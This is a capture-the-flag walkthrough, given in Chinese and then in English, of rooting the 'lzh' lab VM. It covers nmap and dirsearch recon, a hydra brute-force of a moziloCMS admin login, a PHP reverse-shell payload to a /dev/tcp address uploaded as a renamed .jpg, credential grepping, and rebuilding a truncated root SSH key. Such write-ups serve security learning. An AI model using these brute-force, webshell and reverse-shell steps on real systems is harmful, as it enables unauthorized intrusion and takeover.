mazesec lzh
信息收集
# Nmap 7.95 scan initiated Sun Dec 14 06:38:57 2025 as: /usr/lib/nmap/nmap --privileged -sV -v -sC -oN 192.168.110.133 192.168.110.133
Nmap scan report for Lzh.lan (192.168.110.133)
Host is up (0.0012s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
| 256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_ 256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open http Apache httpd 2.4.62 ((Debian))
|_http-server-header: Apache/2.4.62 (Debian)
|_http-title: VisionX | \xE6\x9C\xAA\xE6\x9D\xA5\xE7\xA7\x91\xE6\x8A\x80\xE8\xA7\xA3\xE5\x86\xB3\xE6\x96\xB9\xE6\xA1\x88
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
MAC Address: 08:00:27:D9:88:8A (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Dec 14 06:39:09 2025 -- 1 IP address (1 host up) scanned in 12.33 seconds
# Dirsearch started Sun Dec 14 06:46:14 2025 as: /usr/lib/python3/dist-packages/dirsearch/dirsearch.py -u http://192.168.110.133/
403 280B http://192.168.110.133/.ht_wsr.txt
403 280B http://192.168.110.133/.htaccess_extra
403 280B http://192.168.110.133/.htaccess.orig
403 280B http://192.168.110.133/.htaccess_sc
403 280B http://192.168.110.133/.htaccess_orig
403 280B http://192.168.110.133/.htaccessBAK
403 280B http://192.168.110.133/.htaccess.sample
403 280B http://192.168.110.133/.htaccess.bak1
403 280B http://192.168.110.133/.htaccessOLD2
403 280B http://192.168.110.133/.htaccessOLD
403 280B http://192.168.110.133/.htaccess.save
403 280B http://192.168.110.133/.htm
403 280B http://192.168.110.133/.htpasswd_test
403 280B http://192.168.110.133/.html
403 280B http://192.168.110.133/.httr-oauth
403 280B http://192.168.110.133/.htpasswds
403 280B http://192.168.110.133/.php
200 3MB http://192.168.110.133/backup.zip
403 280B http://192.168.110.133/server-status/
403 280B http://192.168.110.133/server-status
漏洞分析
发现backup.zip,是一个备份网站。其中显露出moziloCMS3.0-3.0.1,其漏洞在此
1. 以管理员身份登录
2. 通过左侧菜单进入“文件”会话
3. 创建一个包含 PHP Web Shell 内容的 .jpg 文件
4. 通过上传图标将文件上传到服务器并保存
5. 在 Web 服务器上将文件重命名为 .php 并保存
6. 通过以下端点访问 Web Shell:
http://127.0.0.1/mozilo3.0-3.0.1/kategorien/Willkommen/dateien/revshell.php
先转到mozilocms目录
http://192.168.110.133/mozilo/ # 主目录
http://192.168.110.133/mozilo/admin/ # admin登陆页面
# 输入次数多了会出现
Access to mozilo Admin is temporarily blocked.
Incorrect access data has been entered too often. # 输入太多错误访问数据,此时不能输入
// Logindaten überprüfen
// 初始化hash
function checkLoginData($user, $pass) {
global $loginpassword;
require_once(BASE_DIR_CMS.'PasswordHash.php');
$t_hasher = new PasswordHash(8, FALSE);
//检查管理员账号
if(($user == $loginpassword->get("name")) and (true === $t_hasher->CheckPassword($pass, $loginpassword->get("pw")))) {
return true;
} elseif((strlen($loginpassword->get("username")) > 4) and ($user == $loginpassword->get("username")) and (true === $t_hasher->CheckPassword($pass, $loginpassword->get("userpw")))) {
return true; //检查备用账号
} else {
return false; //登陆失败返回false
}
}
前端限制不能输入
<input name="login" id="loginbtn" value="Login" class="mo-login_submit button" type="submit" disabled="">
所以可以暴力破解
hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.110.133 http-post-form "/mozilo/admin/index.php:username=admin&password=^PASS^&login=Login:S=302" -t 64 -I
得到admin:Admin123进入后台
利用
<?php
exec("bash -c 'bash -i >& /dev/tcp/192.168.110.141/4444 0>&1'");
?>
准备payload
根据描述即可获取shell,枚举用户—>welcome
www-data@Lzh:/var/www$ grep -r 'welcome' . 2>/dev/null
./html/mozilo/admin/config.php: // welcome:3e73d572ba005bb3c02107b2e2fc16f8
./html/mozilo/gpl.txt: This is free software, and you are welcome to redistribute it
权限提升
在welcome主目录中发现一个id_rsa是属于root的。
但是缺少前三位,这是一个openssh格式的私钥,开头是固定:openssh-key-v1\0
welcome@Lzh:~$ echo -n 'openssh-key-v1' | base64
b3BlbnNzaC1rZXktdjE=
可以进入root了
经验教训
没有仔细阅读注册的源代码,不知道密码政策
mazesec lzh
Information Gathering
# Nmap 7.95 scan initiated Sun Dec 14 06:38:57 2025 as: /usr/lib/nmap/nmap --privileged -sV -v -sC -oN 192.168.110.133 192.168.110.133
Nmap scan report for Lzh.lan (192.168.110.133)
Host is up (0.0012s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
| 256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_ 256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open http Apache httpd 2.4.62 ((Debian))
|_http-server-header: Apache/2.4.62 (Debian)
|_http-title: VisionX | \xE6\x9C\xAA\xE6\x9D\xA5\xE7\xA7\x91\xE6\x8A\x80\xE8\xA7\xA3\xE5\x86\xB3\xE6\x96\xB9\xE6\xA1\x88
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
MAC Address: 08:00:27:D9:88:8A (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Dec 14 06:39:09 2025 -- 1 IP address (1 host up) scanned in 12.33 seconds
# Dirsearch started Sun Dec 14 06:46:14 2025 as: /usr/lib/python3/dist-packages/dirsearch/dirsearch.py -u http://192.168.110.133/
403 280B http://192.168.110.133/.ht_wsr.txt
403 280B http://192.168.110.133/.htaccess_extra
403 280B http://192.168.110.133/.htaccess.orig
403 280B http://192.168.110.133/.htaccess_sc
403 280B http://192.168.110.133/.htaccess_orig
403 280B http://192.168.110.133/.htaccessBAK
403 280B http://192.168.110.133/.htaccess.sample
403 280B http://192.168.110.133/.htaccess.bak1
403 280B http://192.168.110.133/.htaccessOLD2
403 280B http://192.168.110.133/.htaccessOLD
403 280B http://192.168.110.133/.htaccess.save
403 280B http://192.168.110.133/.htm
403 280B http://192.168.110.133/.htpasswd_test
403 280B http://192.168.110.133/.html
403 280B http://192.168.110.133/.httr-oauth
403 280B http://192.168.110.133/.htpasswds
403 280B http://192.168.110.133/.php
200 3MB http://192.168.110.133/backup.zip
403 280B http://192.168.110.133/server-status/
403 280B http://192.168.110.133/server-status
Vulnerability Analysis
Found backup.zip, which is a website backup. It reveals moziloCMS3.0-3.0.1, whose vulnerability is documented here.
1. Log in as administrator
2. Go to the "Files" session via the left menu
3. Create a .jpg file containing PHP Web Shell content
4. Upload the file to the server via the upload icon and save it
5. Rename the file to .php on the web server and save it
6. Access the Web Shell via the following endpoint:
http://127.0.0.1/mozilo3.0-3.0.1/kategorien/Willkommen/dateien/revshell.php
First navigate to the mozilocms directory
http://192.168.110.133/mozilo/ # Main directory
http://192.168.110.133/mozilo/admin/ # Admin login page
# If you input too many times, the following appears:
Access to mozilo Admin is temporarily blocked.
Incorrect access data has been entered too often. # Too many incorrect access attempts, cannot input now
// Verify login credentials
// Initialize hash
function checkLoginData($user, $pass) {
global $loginpassword;
require_once(BASE_DIR_CMS.'PasswordHash.php');
$t_hasher = new PasswordHash(8, FALSE);
// Check administrator account
if(($user == $loginpassword->get("name")) and (true === $t_hasher->CheckPassword($pass, $loginpassword->get("pw")))) {
return true;
} elseif((strlen($loginpassword->get("username")) > 4) and ($user == $loginpassword->get("username")) and (true === $t_hasher->CheckPassword($pass, $loginpassword->get("userpw")))) {
return true; // Check backup account
} else {
return false; // Return false on login failure
}
}
The frontend disables input:
<input name="login" id="loginbtn" value="Login" class="mo-login_submit button" type="submit" disabled="">
Therefore, brute-forcing is possible:
hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.110.133 http-post-form "/mozilo/admin/index.php:username=admin&password=^PASS^&login=Login:S=302" -t 64 -I
Obtained admin:Admin123 to enter the backend.
Exploitation
<?php
exec("bash -c 'bash -i >& /dev/tcp/192.168.110.141/4444 0>&1'");
?>
Prepare the payload.
Follow the description to obtain a shell, then enumerate users -> welcome.
www-data@Lzh:/var/www$ grep -r 'welcome' . 2>/dev/null
./html/mozilo/admin/config.php: // welcome:3e73d572ba005bb3c02107b2e2fc16f8
./html/mozilo/gpl.txt: This is free software, and you are welcome to redistribute it
Privilege Escalation
In the welcome home directory, an id_rsa belonging to root was found.
However, it is missing the first three bytes. This is an OpenSSH format private key, and its header is fixed: openssh-key-v1\0
welcome@Lzh:~$ echo -n 'openssh-key-v1' | base64
b3BlbnNzaC1rZXktdjE=
Now, root access is possible.
Lessons Learned
Did not carefully read the registration source code and was unaware of the password policy.